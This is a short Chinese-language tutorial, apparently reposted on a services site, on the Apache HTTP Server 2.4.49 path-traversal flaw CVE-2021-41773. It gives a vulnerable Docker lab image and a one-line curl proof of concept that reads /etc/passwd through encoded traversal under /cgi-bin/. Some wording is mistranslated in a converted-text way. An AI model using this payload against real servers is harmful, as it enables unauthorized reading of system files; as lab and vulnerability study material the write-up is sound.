目次
四、Apache
4.1 CVE-2021-41773
漏洞简介
影响版本
环境搭建
漏洞复现
四、Apache
4.1 CVE-2021-41773
Apache HTTP Server 路径穿越漏洞
漏洞简介
该漏洞是由于Apache HTTP Server 2.4.49版本存在目次穿越漏洞,在路径穿越目次<Directory/>Require all granted</Directory>答应被访问的的环境下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目次之外的其他文件,在服务端开启了gi或cgid这两个mod的环境下,这个路径穿越漏洞将可以执行任意cgi下令(RCE)。
影响版本
Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
环境搭建
- docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现
1.使用poc
- curl http://IP:PORT/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
